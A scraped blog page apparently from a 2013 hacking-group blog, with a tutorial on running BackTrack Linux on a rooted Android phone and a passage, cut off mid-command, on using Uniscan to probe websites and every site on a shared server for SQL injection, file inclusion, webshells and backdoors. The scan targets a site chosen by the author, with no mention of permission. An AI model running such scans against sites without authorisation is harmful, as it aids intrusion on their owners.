<span style="font-family: Verdana, sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9IVUMtWA8wtefk-Io0_QgTxOE9X6XxHHPHLRnd4-SgJxlr3ZlhY0VlMkKy2L3yxmVaI01fCO7lTZDjEY4gJ6wDXQD1wjfmsYGS7NBCb9OHOA8UKsaIauqRf2q3sh0OygdkmevuCUyL0g/s1600/Screenshot_2013-03-19-21-34-33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9IVUMtWA8wtefk-Io0_QgTxOE9X6XxHHPHLRnd4-SgJxlr3ZlhY0VlMkKy2L3yxmVaI01fCO7lTZDjEY4gJ6wDXQD1wjfmsYGS7NBCb9OHOA8UKsaIauqRf2q3sh0OygdkmevuCUyL0g/s400/Screenshot_2013-03-19-21-34-33.png" width="400" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9IVUMtWA8wtefk-Io0_QgTxOE9X6XxHHPHLRnd4-SgJxlr3ZlhY0VlMkKy2L3yxmVaI01fCO7lTZDjEY4gJ6wDXQD1wjfmsYGS7NBCb9OHOA8UKsaIauqRf2q3sh0OygdkmevuCUyL0g/s1600/Screenshot_2013-03-19-21-34-33.png" imageanchor="1"><br /></a></span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">
We going to show you the easiest way to install backtrack on an android device.</span><span style="font-family: Verdana, sans-serif;">
For this tutorial you need:</span></span><br />
<ul>
<li><span style="color: #f6b26b; font-family: Verdana, sans-serif;">Rooted android device</span></li>
</ul>
<ul>
<li><span style="color: #f6b26b; font-family: Verdana, sans-serif;">Linux installer (Can be found on Google play)</span></li>
</ul>
<ul>
<li><span style="color: #f6b26b; font-family: Verdana, sans-serif;">Zarchiver (Can be found on Google play)</span></li>
</ul>
<ul>
<li><span style="color: #f6b26b; font-family: Verdana, sans-serif;">Busybox (Can be found on Google play)</span></li>
</ul>
<ul>
<li><span style="color: #f6b26b; font-family: Verdana, sans-serif;">Android-VNC (Can be found on Google play)</span></li>
</ul>
<ul>
<li><span style="color: #f6b26b; font-family: Verdana, sans-serif;">Terminal Emulator (Can be found on Google play)</span></li>
</ul>
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;"><br /></span></span>
All of the programs mentioned above are free.</span><span style="font-family: Verdana, sans-serif;">
Ok, now let's start,</span><span style="font-family: Verdana, sans-serif;">
The first thing you need to do is install Busybox from Google play:</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPYKi32JZhYmdzMTGwbzpi7Hc5BfHlxw6pPtD-3MRrPT679tuIvvrYLzcGCJL_247l3KmSAtgxTD43h8y7FMl8Pr20WSDJUt5Sf8QkYNbCiFap383CFAmZOlHIquKHmQvJXOJQYfpzvio/s1600/Screenshot_2013-03-19-21-29-49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPYKi32JZhYmdzMTGwbzpi7Hc5BfHlxw6pPtD-3MRrPT679tuIvvrYLzcGCJL_247l3KmSAtgxTD43h8y7FMl8Pr20WSDJUt5Sf8QkYNbCiFap383CFAmZOlHIquKHmQvJXOJQYfpzvio/s640/Screenshot_2013-03-19-21-29-49.png" width="640" /></span></a><span style="font-family: Verdana, sans-serif;">
Install it, then open it when it's done, it will install some more things.</span><span style="font-family: Verdana, sans-serif;">
When it's done, install Linux Installer from Google Play:</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwBxHZQexkn-fLS0EE0sjecXGS43js4kponDVV_lONYIqLD_pv1JQORm1iwJp4eJf27kzQPDUrx0CrBE7GoySl6nMtAXgWxc1g7j1E1EWvq4F1bkUaG9MY_4_Z4vWR949FtVdgjq0bcNg/s1600/Screenshot_2013-03-19-21-22-29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwBxHZQexkn-fLS0EE0sjecXGS43js4kponDVV_lONYIqLD_pv1JQORm1iwJp4eJf27kzQPDUrx0CrBE7GoySl6nMtAXgWxc1g7j1E1EWvq4F1bkUaG9MY_4_Z4vWR949FtVdgjq0bcNg/s640/Screenshot_2013-03-19-21-22-29.png" width="640" /></span></a><span style="font-family: Verdana, sans-serif;"><br />
</span></span><br />
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">Open Linux installer, then click on Install Guides from the list on your right hand side:</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3qI4h_45eL5L_VA7vMd1rgcaFRjNU4_DwotCXeDoGDpZqyxHbbczJCfagpwCMd5o3nGZMqvLkxZtQSkwglCEgBgoDwitXXn9Lu1ngdU15iIuSeHUxk97AlcoMiFeXRX1OolA74QH1xas/s1600/Screenshot_2013-03-19-21-57-37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3qI4h_45eL5L_VA7vMd1rgcaFRjNU4_DwotCXeDoGDpZqyxHbbczJCfagpwCMd5o3nGZMqvLkxZtQSkwglCEgBgoDwitXXn9Lu1ngdU15iIuSeHUxk97AlcoMiFeXRX1OolA74QH1xas/s640/Screenshot_2013-03-19-21-57-37.png" width="640" /></span></a><span style="font-family: Verdana, sans-serif;"><br />
</span></span><br />
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">When you click that, you'll see a list of Linux distros, click on
Backtrack and you will see a screen with steps on how to install it. Now
click on the second page of those steps, you will get a page that looks
like this:</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNJTzb3IuLC8rq8UaqIVN4KAGA_BZZMmzy1nUije7Bmye6iiTIWoEpBBSc4d2909tnzuu3COw2g_t3olTmDp6WtQ8a_gkH2ZFv_cHMspNndUtQlgjEyoQq0PrxbYYLixQ9hLwQ-OjWQ8U/s1600/Screenshot_2013-03-19-21-23-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNJTzb3IuLC8rq8UaqIVN4KAGA_BZZMmzy1nUije7Bmye6iiTIWoEpBBSc4d2909tnzuu3COw2g_t3olTmDp6WtQ8a_gkH2ZFv_cHMspNndUtQlgjEyoQq0PrxbYYLixQ9hLwQ-OjWQ8U/s640/Screenshot_2013-03-19-21-23-20.png" width="640" /></span></a><span style="font-family: Verdana, sans-serif;">
Just click on "Download Image", and let it finish downloading.</span><span style="font-family: Verdana, sans-serif;">
While it's downloading, open Google play and install Terminal Emulator, and Zarchiver.</span><span style="font-family: Verdana, sans-serif;"><br />
</span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f6b26b;">Terminal Emulator:</span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipXBL9hTYH2Pi9rzqi2UsYeBsUYLygotoP3ztYmjB06niMqWAfAb6e_3C_ADspIK1wB9oNNqJIQAoxtIgWwQT8t3MtqOXo0m73JF_yjK8D34sIV-2RPNNjF7aC9snorB9GgyivjWJomIk/s1600/Screenshot_2013-03-19-21-25-42.png" imageanchor="1" style="color: #f3f3f3; margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipXBL9hTYH2Pi9rzqi2UsYeBsUYLygotoP3ztYmjB06niMqWAfAb6e_3C_ADspIK1wB9oNNqJIQAoxtIgWwQT8t3MtqOXo0m73JF_yjK8D34sIV-2RPNNjF7aC9snorB9GgyivjWJomIk/s640/Screenshot_2013-03-19-21-25-42.png" width="640" /></span></a><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br />
</span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f6b26b;">Zarchiver:</span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiblDFRBEYTLZn9FtOSYC4V0GHOGbopPbFsv5e4rojSkkbt6NoKdlUFhUjbW6JhEFdUx1mcQ5Ynv7O5UoTa1oUC-v3sWfwIvMkb5RbmUo9-VLevH6v2qzYXkqxzOxQXqKdQJqW6IdeQ48Q/s1600/Screenshot_2013-03-19-21-26-48.png" imageanchor="1" style="color: #f3f3f3; margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiblDFRBEYTLZn9FtOSYC4V0GHOGbopPbFsv5e4rojSkkbt6NoKdlUFhUjbW6JhEFdUx1mcQ5Ynv7O5UoTa1oUC-v3sWfwIvMkb5RbmUo9-VLevH6v2qzYXkqxzOxQXqKdQJqW6IdeQ48Q/s640/Screenshot_2013-03-19-21-26-48.png" width="640" /></span></a><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br />
</span><br />
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">When it finishes downloading, open Zarchiver, and look for the ZIP file
that you downloaded, and extraxt the image into a root folder called
"backtrack", extract the image into an external memory card not the
internal one.</span><span style="font-family: Verdana, sans-serif;">
Once it's done, open Linux Installer again, and click on launch, you'll get a screen that looks like this:</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEd_2KHlk4US4y2UhIoqHO1nqzlRPaWvMOe0RET4_lbeg5keslCDQFCVId5HMOePyMHFzDcTbQN6u4kXiRdemXNPxgnjLmtp-0FsrXlRVViLhGlL2mIMzS_Z7c_rWlD7bRNXPfMapIe2w/s1600/Screenshot_2013-03-19-21-31-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEd_2KHlk4US4y2UhIoqHO1nqzlRPaWvMOe0RET4_lbeg5keslCDQFCVId5HMOePyMHFzDcTbQN6u4kXiRdemXNPxgnjLmtp-0FsrXlRVViLhGlL2mIMzS_Z7c_rWlD7bRNXPfMapIe2w/s640/Screenshot_2013-03-19-21-31-44.png" width="640" /></span></a><span style="font-family: Verdana, sans-serif;"><br />
</span></span><br />
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">If it didn't recognize any distro, click on Setting > Edit then
change the file path there to your backtrack image, the .img file that
you extracted.</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
When it finally say "backtrack" on the drop down list, click "Start Linux" </span><span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;">
Terminal Emulator will open, you just have to proceed with the
installation steps, ask you for a new password, and some preferences.
When it's done you will get a red "</span><span style="color: #e06666;">root@localhost~#</span><span style="color: #f3f3f3;">" like the picture
bellow:</span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyjnVE8iw4rejCdD5nwcoqcyOW3lz3XK103vheMjMrvjDoNOu-bjlF3Oth96Ldr4acw702YWMPyCvlIDA7F-V47r3du43NmAEwLf21hhjUZ0hZ0gD6a2FclLS_43fFgyUMSFaM8o9zmzs/s1600/Screenshot_2013-03-19-21-31-08.png" imageanchor="1" style="color: #f3f3f3; margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyjnVE8iw4rejCdD5nwcoqcyOW3lz3XK103vheMjMrvjDoNOu-bjlF3Oth96Ldr4acw702YWMPyCvlIDA7F-V47r3du43NmAEwLf21hhjUZ0hZ0gD6a2FclLS_43fFgyUMSFaM8o9zmzs/s640/Screenshot_2013-03-19-21-31-08.png" width="640" /></span></a><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
You are now in backtrack!</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
Now if you want backtrack in GUI, open Google play, and install Android VNC:</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKlhPP4pgvIpCEL3RwXiPZOBveIkTZv5yt64Ee9cg_-vZ7ADPWmdClh7MiSNIVhd8sFw7ctdZ-yLVZ6c-BCk1r28_nUsgvEhOveaBApUSi9Avxz35jed3kdSVH6snqCCithqtIM2WAc-0/s1600/Screenshot_2013-03-19-21-25-01.png" imageanchor="1" style="color: #f3f3f3; margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKlhPP4pgvIpCEL3RwXiPZOBveIkTZv5yt64Ee9cg_-vZ7ADPWmdClh7MiSNIVhd8sFw7ctdZ-yLVZ6c-BCk1r28_nUsgvEhOveaBApUSi9Avxz35jed3kdSVH6snqCCithqtIM2WAc-0/s640/Screenshot_2013-03-19-21-25-01.png" width="640" /></span></a><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br />
</span><br />
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">Open It when it finishes installing, and it will look like this:</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-p8H-VkrWqjXojIzkBUu5VN9w5pAlhrcrFWttZHiuO3l8axtGCiq-qU-8Crn_qnSpdR2H2vqahhiFkhQ17LOhDs_uu_zIuYwDFb1pWDW40oF0oFLDTBkMvE3vtOz-0-vmJlPTDtdd5H8/s1600/Screenshot_2013-03-19-21-32-08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-p8H-VkrWqjXojIzkBUu5VN9w5pAlhrcrFWttZHiuO3l8axtGCiq-qU-8Crn_qnSpdR2H2vqahhiFkhQ17LOhDs_uu_zIuYwDFb1pWDW40oF0oFLDTBkMvE3vtOz-0-vmJlPTDtdd5H8/s640/Screenshot_2013-03-19-21-32-08.png" width="640" /></span></a><span style="font-family: Verdana, sans-serif;"><br />
</span></span><br />
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">Set to the same settings in the picture, but not the IP address, you can
get your IP by opening backtrack terminal, in terminal emulator, and
running "ifconfig" command:</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ4Ug0iekj9PEAyT8MGzKB_EphEc3Jr5JJJFVfMuboEJZ7X5-DYRM9Mn7h9DjzbkfmWEM3HXI-ShKhHDkUqA0gs6SWJIeuOrkjcI4XOKCVpUYh2Y4bROAou10ItAETqBJnyDloC38XVRQ/s1600/Screenshot_2013-03-19-21-32-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ4Ug0iekj9PEAyT8MGzKB_EphEc3Jr5JJJFVfMuboEJZ7X5-DYRM9Mn7h9DjzbkfmWEM3HXI-ShKhHDkUqA0gs6SWJIeuOrkjcI4XOKCVpUYh2Y4bROAou10ItAETqBJnyDloC38XVRQ/s640/Screenshot_2013-03-19-21-32-45.png" width="640" /></span></a><span style="font-family: Verdana, sans-serif;">
Settings for VNC are,</span><span style="font-family: Verdana, sans-serif;">
Username: backtrack</span><span style="font-family: Verdana, sans-serif;">
Password: backtrack</span><span style="font-family: Verdana, sans-serif;">
IP: from the "ifconfig" command or just put 127.0.0.1 </span><span style="font-family: Verdana, sans-serif;">
Color Format: 24-bit</span><span style="font-family: Verdana, sans-serif;">
Now click connect, and boom! You'r in backtrack Desktop! ;)</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9IVUMtWA8wtefk-Io0_QgTxOE9X6XxHHPHLRnd4-SgJxlr3ZlhY0VlMkKy2L3yxmVaI01fCO7lTZDjEY4gJ6wDXQD1wjfmsYGS7NBCb9OHOA8UKsaIauqRf2q3sh0OygdkmevuCUyL0g/s1600/Screenshot_2013-03-19-21-34-33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9IVUMtWA8wtefk-Io0_QgTxOE9X6XxHHPHLRnd4-SgJxlr3ZlhY0VlMkKy2L3yxmVaI01fCO7lTZDjEY4gJ6wDXQD1wjfmsYGS7NBCb9OHOA8UKsaIauqRf2q3sh0OygdkmevuCUyL0g/s640/Screenshot_2013-03-19-21-34-33.png" width="640" /></span></a><span style="font-family: Verdana, sans-serif;"><br />
</span></span><br />
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">When you finish using it, remember to disconnect VNC AND exit backtrack
in Terminal Emulator, else it will be taking your battery in the
background.</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuxDZO82a85mNlgVwTZsHiITQXQbBpyLdF8IG2qMnh_SI78n-yencP2HaB1OMMGTKHd3dVwQFRkvWG5uP_HWPyW5e1fv7hJzY-I_MFzIKdHCACWMSpnCqT8xbOHPtzcCEwX-SAPqXMyKc/s1600/Screenshot_2013-03-19-21-42-18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuxDZO82a85mNlgVwTZsHiITQXQbBpyLdF8IG2qMnh_SI78n-yencP2HaB1OMMGTKHd3dVwQFRkvWG5uP_HWPyW5e1fv7hJzY-I_MFzIKdHCACWMSpnCqT8xbOHPtzcCEwX-SAPqXMyKc/s640/Screenshot_2013-03-19-21-42-18.png" width="640" /></span></a><span style="font-family: Verdana, sans-serif;">
And note that Ubuntu can be installed in the same exact way, just the username and password for VNC will change.</span></span><br />
<br />
<div dir="ltr" trbidi="on">
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<br /></div>
<div>
</div>
</div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-12144495715814117962013-08-09T13:02:00.000-04:002013-08-09T13:05:29.930-04:00Website Vulnerability Scanning Using BackTrack <div dir="ltr" style="text-align: left;" trbidi="on">
<div id="crosscol-wrapper" style="text-align: center;">
<div class="crosscol section" id="crosscol">
<div class="widget HTML" id="HTML1">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
</div>
<div id="main-wrapper">
<div class="main section" id="main">
<div class="widget Blog" id="Blog1">
<div class="blog-posts hfeed">
<div class="date-outer">
<div class="date-posts">
<div class="post-outer">
<div class="post hentry">
<span style="font-family: Verdana, sans-serif;"><a href="http://www.blogger.com/blogger.g?blogID=5858162330672279498" name="2695961931986240975"></a>
</span>
<br />
<div style="text-align: center;">
<span style="color: #e06666; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">Scan Website For Vulnerabilities Using BackTrack - Uniscan</span></div>
<div class="post-body entry-content">
<div style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">Hello CHC members we gonna scan for vulnerabilities in a website, or all the websites in the server.</span></span></div>
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">
In this tutorial I will use a program in BackTrack called UniScan. it's very easy to use, but very good in scanning.</span></span><br />
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">
First of all, open your terminal and type this command:</span></span><span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">
cd /pentest/web/uniscan && ./uniscan.pl</span></span><span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;"><br /></span></span><br />
<div style="text-align: center;">
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7umnk4qVLDXDl1MUTvnvDw6nW3_bq2JMyA9Tdldpb6ugnlxpiMoXFZncVtksc4jKh11yuRBE8IdZiCXpOEIEsgv80DzjISiCCVP71u4hr_o_jkJ0WimxntHdvXJoHPwgXRm7oqYlJgow/s1600/rsz_uniscan_-_how_to_scan_website_for_vulnerabilities.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7umnk4qVLDXDl1MUTvnvDw6nW3_bq2JMyA9Tdldpb6ugnlxpiMoXFZncVtksc4jKh11yuRBE8IdZiCXpOEIEsgv80DzjISiCCVP71u4hr_o_jkJ0WimxntHdvXJoHPwgXRm7oqYlJgow/s400/rsz_uniscan_-_how_to_scan_website_for_vulnerabilities.png" width="400" /></span></a></span></span></div>
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">
Something like this will be printed on your terminal. Now all we have to do is follow the instructions.</span></span><span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">
First of all we need a target to scan, I've chose one already and I will use it in my pictures.</span></span><span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">
To start the scan, first you have to check the options which you want to use in your scan.</span></span><br />
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;"><br /></span></span><span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">
# HOW TO USE OPTIONS:</span></span><span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">
Check the letter beside your option, and include it after the URL like this:</span></span><span style="font-family: Verdana, sans-serif;"><span style="color: lime;"> </span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: lime;">./uniscan.pl -u http://www.website.com/ -b -q -d -w</span></span><span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;"> </span></span><span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;">or put them all together.</span></span><span style="font-family: Verdana, sans-serif;"><span style="color: lime;"> </span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: lime;">./uniscan.pl -u http://www.website.com/ -bqdw</span></span><span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"> .This will start your scan with all the different options you included.</span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: red;">NOTE:- NEVER FORGET THE FORWARD SLASH AT THE END OF THE LINK IN THE END!!</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"> Now the scan will start, and the terminal will look something like this:</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv8bAjBQ23X4Yyt5TvwY74sdH2Jjr_5gwEq8KkBBkgsOptvBK5J9D6JkqsU25L80NjzzcfmhQ6qg1gjlXCktS6UMwXa_vzhK7fKIzX8ryZKX3Dkx_kn8VPYzZ5pESBENAZx4Qtkhh3h6M/s1600/Uniscan+-+How+to+scan+website+for+vulnerabilities1.png" imageanchor="1" style="font-family: Verdana, sans-serif; margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv8bAjBQ23X4Yyt5TvwY74sdH2Jjr_5gwEq8KkBBkgsOptvBK5J9D6JkqsU25L80NjzzcfmhQ6qg1gjlXCktS6UMwXa_vzhK7fKIzX8ryZKX3Dkx_kn8VPYzZ5pESBENAZx4Qtkhh3h6M/s400/Uniscan+-+How+to+scan+website+for+vulnerabilities1.png" width="400" /></a><br />
<br /></div>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">This
scan will scan for vulnerabilities like SQL-i / LFI / RFI and so on. It
also searches for Webshells, backdoors, PHP info disclosure, Emails, and
much more.</span><br />
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
Here are some examples:</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
PHP.info() disclosure:</span><br />
<div style="text-align: center;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFMSfhYEx9Mjh2KRCpPyibT6veqGPjnMwGYk4uGfnMaVmI4nBoneAEVCNfPwWK3VvunTY0-RqJzC3mdfA8CIA2cbLeXSPpd1ZuPqYykbO_6jSPaErhTdFaeSfD30KLqqO2ALrUzRm2a0Q/s1600/rsz_uniscan_-_how_to_scan_website_for_vulnerabilities3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFMSfhYEx9Mjh2KRCpPyibT6veqGPjnMwGYk4uGfnMaVmI4nBoneAEVCNfPwWK3VvunTY0-RqJzC3mdfA8CIA2cbLeXSPpd1ZuPqYykbO_6jSPaErhTdFaeSfD30KLqqO2ALrUzRm2a0Q/s400/rsz_uniscan_-_how_to_scan_website_for_vulnerabilities3.png" width="400" /></span></a></span></div>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
External Links/Hosts:</span><br />
<div style="text-align: center;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7wR0HUS0mswcDG_3EZAi2AUCeBcFyKGrn0nlVu4Qg7t8f9sAHlHBprcIWY4SwLDV6hr-YIueka9rua0BBWEY2jYeax6V9J2-FTZsApjjKl7szua6cT-yZqCnoVlHoLhLg151806iAVO4/s1600/rsz_uniscan_-_how_to_scan_website_for_vulnerabilities4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7wR0HUS0mswcDG_3EZAi2AUCeBcFyKGrn0nlVu4Qg7t8f9sAHlHBprcIWY4SwLDV6hr-YIueka9rua0BBWEY2jYeax6V9J2-FTZsApjjKl7szua6cT-yZqCnoVlHoLhLg151806iAVO4/s400/rsz_uniscan_-_how_to_scan_website_for_vulnerabilities4.png" width="283" /></a></span></span><br />
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
Source Code disclosure:<br /><div style="text-align: center;">
<span style="font-family: Verdana, sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKpkyNIdf1bWVnAnmrgS2sd4uDHPXyemomVXBeBZVLsMicMkCPRfh_mIQwVfpWvWRLWBt_V4sEOhFEAS4Wnm2CMh_qApaMaNNbbrqhJ-5ct3xxkQirCujveYlb2VFENphiUv09VP_m6JA/s1600/rsz_uniscan_-_how_to_scan_website_for_vulnerabilities5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKpkyNIdf1bWVnAnmrgS2sd4uDHPXyemomVXBeBZVLsMicMkCPRfh_mIQwVfpWvWRLWBt_V4sEOhFEAS4Wnm2CMh_qApaMaNNbbrqhJ-5ct3xxkQirCujveYlb2VFENphiUv09VP_m6JA/s400/rsz_uniscan_-_how_to_scan_website_for_vulnerabilities5.png" width="400" /></a></span><br />
<br /></div>
</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
Dynamic Scan, Vulnerability Identification:<br /><div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCdSsBh8dclNTG2ZTcJnlSF2mU25WYpd2Ej0wnhN36l_2GaGJlbZ2v0Ysebdctp4Bxmucu29UzW3YtxOoM5hIkafVOjnO9I5csrs6rMNb9MdzZTVqspMM69sFp1yvROiOIZRvEYD1Iru4/s1600/rsz_uniscan_-_how_to_scan_website_for_vulnerabilities6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCdSsBh8dclNTG2ZTcJnlSF2mU25WYpd2Ej0wnhN36l_2GaGJlbZ2v0Ysebdctp4Bxmucu29UzW3YtxOoM5hIkafVOjnO9I5csrs6rMNb9MdzZTVqspMM69sFp1yvROiOIZRvEYD1Iru4/s400/rsz_uniscan_-_how_to_scan_website_for_vulnerabilities6.png" width="400" /></span></a></div>
</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
This program can also get all the sites in a server, and then you will be able to scan all of them.</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
To do that, run this command:</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><span style="color: lime; font-family: Verdana, sans-serif;">
